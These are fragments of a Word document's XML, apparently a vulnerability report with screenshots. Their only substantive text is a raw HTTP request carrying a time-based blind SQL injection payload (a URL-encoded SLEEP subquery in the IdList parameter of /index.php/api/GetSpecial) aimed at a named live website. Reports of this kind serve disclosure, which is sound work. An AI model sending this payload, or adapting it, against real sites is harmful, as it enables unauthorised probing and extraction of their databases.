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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.hrjnjd.org.cn/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="3185160"/>
            <wp:effectExtent l="0" t="0" r="381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GET /index.php/api/GetSpecial?debug=1&amp;ChannelID=1&amp;IdList=1,1%29%20and%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%286%29%29%29A HTTP/2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Host: www.hrjnjd.org.cn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User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE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Accept-Encoding: gzip, deflate, br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Accept: */*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Accept-Author: 1f0c42b2f264071be0507acea1876c74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63515" cy="2950210"/>
            <wp:effectExtent l="0" t="0" r="698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5050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2024-03-15T10:07:00Z</dcterms:created>
  <dc:creator>86132</dc:creator>
  <cp:lastModifiedBy>㉨</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-15T10:09:08Z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EEB431B6E4B4487AAFCA86A6B17049EF_12</vt:lpwstr>
  </property>
</Properties>
</file>